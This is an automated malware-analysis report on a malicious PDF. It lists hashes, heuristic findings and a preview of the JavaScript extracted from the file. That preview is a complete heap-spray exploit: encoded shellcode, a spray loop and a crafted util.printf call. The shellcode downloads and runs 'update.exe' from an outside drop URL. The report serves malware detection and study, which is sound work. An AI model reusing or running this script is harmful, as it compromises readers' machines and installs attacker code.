Malicious PDF — malware analysis report

Static analysis result for SHA-256 92af93fbcfd7923e…

MALICIOUS

PDF

2.7 KB First seen: 2026-05-09
MD5: e0db5b057c4193a83f3240e305131119 SHA-1: 26ec62bc60f0857f432d8910fea50d327c28c20b SHA-256: 92af93fbcfd7923e88eb78a138f95fa2a6489aaebe22b2dea58169fb3a977006
104 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • RichMedia (Flash) high PDF_RICHMEDIA
    PDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ In PDF document text
    • http://www.xfa.org/schema/xci/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.6/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x106 1561 bytes
SHA-256: f6e4f4850b67351d3c1e4ca293a85a0003f61ee6b03c4677d3058aa86e7af5b3
Preview script
First 1,000 lines of the extracted script
var k = '60000';var k1 = 0x40000;var k2 = 1450;var code = '\u42EB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uEBFF\u6074\uC931\u8B64\u3071\u768B\u8B0C\u1C76\u5E8B\u8B08\u2056\u368B\u3966\u184A\uF275\u5C89\u1C24\uC361\u5EEB\u8B60\u246C\u8B24\u3C45\u548B\u7805\uEA01\u4A8B\u8B18\u205A\uEB01\u37E3\u8B49\u8B34\uEE01\uFF31\uC031\uACFC\uC084\u0A74\uCFC1\u010F\uE9C7\uFFF1\uFFFF\u7C3B\u2824\uDE75\u5A8B\u0124\u66EB\u0C8B\u8B4B\u1C5A\uEB01\u048B\u018B\u89E8\u2444\u611C\uEBC3\u315A\u52D2\u5352\u5255\uD0FF\u1AEB\u63EB\u78E8\uFFFF\uBAFF\u99F8\u3C3F\u5052\u8FE8\uFFFF\u31FF\u52D2\uD0FF\u33EB\u60E8\uFFFF\uBAFF\u1EE3\u1012\u5052\u77E8\uFFFF\u31FF\u81D2\uFFC2\uFFFF\u81FF\uFAEA\uFFFF\u52FF\uFF53\uEBD0\uBAC3\u9D33\u725E\u5052\u57E8\uFFFF\uEBFF\uEBA8\uE85A\uFF2B\uFFFF\u6CBA\u3C43\u5258\uE850\uFF42\uFFFF\uFF56\uEBD0\uE8DA\uFEF4\uFFFF\u7275\u6D6C\u6E6F\u642E\u6C6C\u75FF\u6470\u7461\u2E65\u7865\uFF65\u7468\u7074\u2F3A\u652F\u7078\u3461\u2E36\u6F63\u632E\u2F63\u6C62\u2F32\u7264\u706F\u702E\u7068\u653F\u413D\u6F64\u6562\u322D\u3030\u2D38\u3932\u3239\uCDFF\u0003';var n = '\u4b4f\u4027';var a = '';for (b = 128; b >= 0; --b) a += n;c = a + code;d = n;e = 20;f = e + c.length;while (d.length < f) d += d;g = d.substring(0, f);h = d.substring(0, d.length - f);while(h.length + f < k1) h = h + h + g;i = new Array();for (j = 0; j < k2; j++) i[j] = h + c;var s = 10;s = s - 10;var st = '.f%';var p = st.substring(2,3);var dot = st.substring(0,1);var lF = st.substring(1,2);var pkdk1f = p + k + dot + k + lF;util.printf(pkdk1f, s);

Open this report in the interactive analyzer, or submit your own file for analysis.